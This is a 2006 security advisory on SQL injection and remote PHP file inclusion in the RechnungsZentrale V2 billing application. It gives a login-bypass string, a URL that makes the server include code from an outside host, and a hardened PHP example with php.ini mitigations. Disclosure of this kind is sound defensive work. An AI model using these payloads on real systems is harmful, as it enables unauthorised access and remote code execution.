
RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities



    ----------------------------------------------------------------------------------
    - GroundZero Security Research and Software Development 2006                     - 
    ----------------------------------------------------------------------------------
    -                                                                                -
    -  Security Advisory regarding RechnungsZentrale v2.                             -
    -  SQL Injection and Remote File inclusion Vulnerabilities.                      -
    -  Released: Tue Apr 18 18:00:00 CEST 2006                                       -
    -                                                                                -
    ----------------------------------------------------------------------------------



    ----------------------------------------------------------------------------------
    - Affected:                                                                      -
    ----------------------------------------------------------------------------------

    Software:	RechnungsZentrale V2
    Version:	1.1.3, likely older versions are affected as well.
    Vendor: 	http://www.nfec.de/


    ----------------------------------------------------------------------------------
    - Information:                                                                   -
    ----------------------------------------------------------------------------------

    "RechnungsZentrale V2 is a multiuser, Web-based billing application. 
     It facilitates the creation of bills and the management of customers. 
     It is written in PHP and uses MySQL. It supports German, English, French, 
     and Dansk languages."

    The software contains vulnerabilities which allow an attacker to conduct
    SQL injection and remote file inclusion attacks prior to authentication.

    The SQL injection vulnerability exists in the login script (authent.php4) and
    allows an attacker to log into the internal interface or execute malicious
    SQL commands.

    PoC:
    	User: ' OR '1'='1
    	Password: 1


    In the same script it is possible to include a remote PHP script by pointing the
    "rootpath=" parameter at a remote PHP script that calls system() or passthru().

    Doing so would allow an unauthenticated attacker to execute shell commands with
    the permissions of the web server.

    PoC: 
    	http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4
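
    Both flaws come from request input reaching SQL text and an include path.
    The PHP below is an added example, not RechnungsZentrale source and not
    written by the advisory's authors: it shows the general vulnerable pattern
    (as comments) beside a hardened form. Table, column, module and function
    names are assumptions, and SQLite stands in for MySQL so it runs offline.

```php
<?php
// Added example; not RechnungsZentrale source. All names here are assumptions.

// --- General vulnerable pattern (comments only, shown for contrast) ---
// include($_GET['rootpath'] . '/mod/db.php4');         // caller chooses the include source
// $sql = "SELECT id FROM users WHERE name = '$user'";  // input spliced into SQL text

// Hardened include: the base directory is a constant; no request value reaches include.
define('APP_ROOT', __DIR__);

function load_module(string $name): void
{
    // Allow-list of module files the login script may load (hypothetical names).
    $allowed = ['db' => 'db.php', 'lang' => 'lang.php'];
    if (!isset($allowed[$name])) {
        throw new InvalidArgumentException('unknown module');
    }
    require_once APP_ROOT . '/mod/' . $allowed[$name];
}

// Hardened login: user input is bound as a parameter and never becomes SQL syntax.
function authenticate(PDO $db, string $user, string $password): ?int
{
    $stmt = $db->prepare('SELECT id, pw_hash FROM users WHERE name = :name');
    $stmt->execute([':name' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['pw_hash'])) {
        return null;
    }
    return (int) $row['id'];
}

// Constructed demo data in an in-memory SQLite database (stand-in for MySQL).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT UNIQUE, pw_hash TEXT)');
$ins = $db->prepare('INSERT INTO users (name, pw_hash) VALUES (?, ?)');
$ins->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);

var_dump(authenticate($db, 'alice', 'correct horse')); // valid credentials
var_dump(authenticate($db, "' OR '1'='1", '1'));       // user/password values from the PoC above
```

    Where the code cannot be changed, setting allow_url_fopen = Off (and
    allow_url_include = Off on PHP 5.2 and later) in php.ini stops include()
    from fetching URLs.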


    ----------------------------------------------------------------------------------
    - Vendor Response:                                                               -
    ----------------------------------------------------------------------------------

    Notified: 	Tue Apr 18 16:12:14 CEST 2006
    Response: 	Tue Apr 18 17:13:14 CEST 2006 
	      	(Development Discontinued)
    Disclosure:	Tue Apr 18 18:00:00 CEST 2006


    ----------------------------------------------------------------------------------
    - Bugs discovered by GroundZero Security Research and Software Development       -
    - http://www.GroundZero-Security.com | Http://www.g-0.org                        -
    ----------------------------------------------------------------------------------
